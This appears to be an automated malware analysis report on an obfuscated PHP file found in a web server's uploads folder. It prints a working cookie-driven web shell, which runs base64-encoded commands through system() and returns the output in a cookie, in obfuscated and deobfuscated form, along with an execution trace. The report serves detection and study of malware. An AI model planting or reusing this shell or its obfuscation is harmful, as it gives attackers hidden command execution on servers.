u413x.php, u413x.txt

md5: f2160cdbcdc06aa1bf41c708a6984bd8

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Encoding
base64_decode (Deobfuscated, Traces)
base64_encode (Deobfuscated, Traces)

Execution
eval (Original)
system (Deobfuscated, Traces)

Deobfuscated PHP code
<?php

$b = "base64_decode";
eval /* PHPDeobfuscator eval output */ {
    if (isset($_COOKIE['cm'])) {
        ob_start();
        system(base64_decode($_COOKIE['cm']) . ' 2>&1');
        setcookie($_COOKIE['cn'], $_COOKIE['cp'] . base64_encode(ob_get_contents()) . $_COOKIE['cp']);
        ob_end_clean();
    }
};
Execution traces
data/traces/f2160cdbcdc06aa1bf41c708a6984bd8_trace-1676260545.6547.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:56:11.552538]
1	0	1	0.000153	393512
1	3	0	0.000206	394648	{main}	1		/var/www/html/uploads/u413x.php	0	0
2	4	0	0.000222	394648	strrev	0		/var/www/html/uploads/u413x.php	1	1	'edoced_46esab'
2	4	1	0.000239	394720
2	4	R			'base64_decode'
1		A						/var/www/html/uploads/u413x.php	1	$b = 'base64_decode'
2	5	0	0.000266	394688	str_replace	0		/var/www/html/uploads/u413x.php	1	3	' '	''	'a W Y o a X N z Z X Q o J F 9 D T 0 9 L S U V b J 2 N t J 1 0 p K X t v Y l 9 z d G F y d C g p O 3 N 5 c 3 R l b S h i Y X N l N j R f Z G V j b 2 R l K C R f Q 0 9 P S 0 l F W y d j b S d d K S 4 n I D I + J j E n K T t z Z X R j b 2 9 r a W U o J F 9 D T 0 9 L S U V b J 2 N u J 1 0 s J F 9 D T 0 9 L S U V b J 2 N w J 1 0 u Y m F z Z T Y 0 X 2 V u Y 2 9 k Z S h v Y l 9 n Z X R f Y 2 9 u d G V u d H M o K S k u J F 9 D T 0 9 L S U V b J 2 N w J 1 0 p O 2 9 i X 2 V u Z F 9 j b G V h b i g p O 3 0 = '
2	5	1	0.000308	395104
2	5	R			'aWYoaXNzZXQoJF9DT09LSUVbJ2NtJ10pKXtvYl9zdGFydCgpO3N5c3RlbShiYXNlNjRfZGVjb2RlKCRfQ09PS0lFWydjbSddKS4nIDI+JjEnKTtzZXRjb29raWUoJF9DT09LSUVbJ2NuJ10sJF9DT09LSUVbJ2NwJ10uYmFzZTY0X2VuY29kZShvYl9nZXRfY29udGVudHMoKSkuJF9DT09LSUVbJ2NwJ10pO29iX2VuZF9jbGVhbigpO30='
2	6	0	0.000334	395008	base64_decode	0		/var/www/html/uploads/u413x.php	1	1	'aWYoaXNzZXQoJF9DT09LSUVbJ2NtJ10pKXtvYl9zdGFydCgpO3N5c3RlbShiYXNlNjRfZGVjb2RlKCRfQ09PS0lFWydjbSddKS4nIDI+JjEnKTtzZXRjb29raWUoJF9DT09LSUVbJ2NuJ10sJF9DT09LSUVbJ2NwJ10uYmFzZTY0X2VuY29kZShvYl9nZXRfY29udGVudHMoKSkuJF9DT09LSUVbJ2NwJ10pO29iX2VuZF9jbGVhbigpO30='
2	6	1	0.000357	395360
2	6	R			'if(isset($_COOKIE[\'cm\'])){ob_start();system(base64_decode($_COOKIE[\'cm\']).\' 2>&1\');setcookie($_COOKIE[\'cn\'],$_COOKIE[\'cp\'].base64_encode(ob_get_contents()).$_COOKIE[\'cp\']);ob_end_clean();}'
2	7	0	0.000402	398552	eval	1	'if(isset($_COOKIE[\'cm\'])){ob_start();system(base64_decode($_COOKIE[\'cm\']).\' 2>&1\');setcookie($_COOKIE[\'cn\'],$_COOKIE[\'cp\'].base64_encode(ob_get_contents()).$_COOKIE[\'cp\']);ob_end_clean();}'	/var/www/html/uploads/u413x.php	1	0
2	7	1	0.000424	398552
1	3	1	0.000432	395504
			0.000455	314520
TRACE END   [2023-02-13 01:56:11.552869]

Generated HTML code
<html><head></head><body></body></html>
Original PHP code
<?php $b=strrev("edoced_4"."6esab");eval($b(str_replace(" ","","a W Y o a X N z Z X Q o J F 9 D T 0 9 L S U V b J 2 N t J 1 0 p K X t v Y l 9 z d G F y d C g p O 3 N 5 c 3 R l b S h i Y X N l N j R f Z G V j b 2 R l K C R f Q 0 9 P S 0 l F W y d j b S d d K S 4 n I D I + J j E n K T t z Z X R j b 2 9 r a W U o J F 9 D T 0 9 L S U V b J 2 N u J 1 0 s J F 9 D T 0 9 L S U V b J 2 N w J 1 0 u Y m F z Z T Y 0 X 2 V u Y 2 9 k Z S h v Y l 9 n Z X R f Y 2 9 u d G V u d H M o K S k u J F 9 D T 0 9 L S U V b J 2 N w J 1 0 p O 2 9 i X 2 V u Z F 9 j b G V h b i g p O 3 0 = "))); ?>
PHP Malware Analysis

u413x.php, u413x.txt

md5: f2160cdbcdc06aa1bf41c708a6984bd8

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
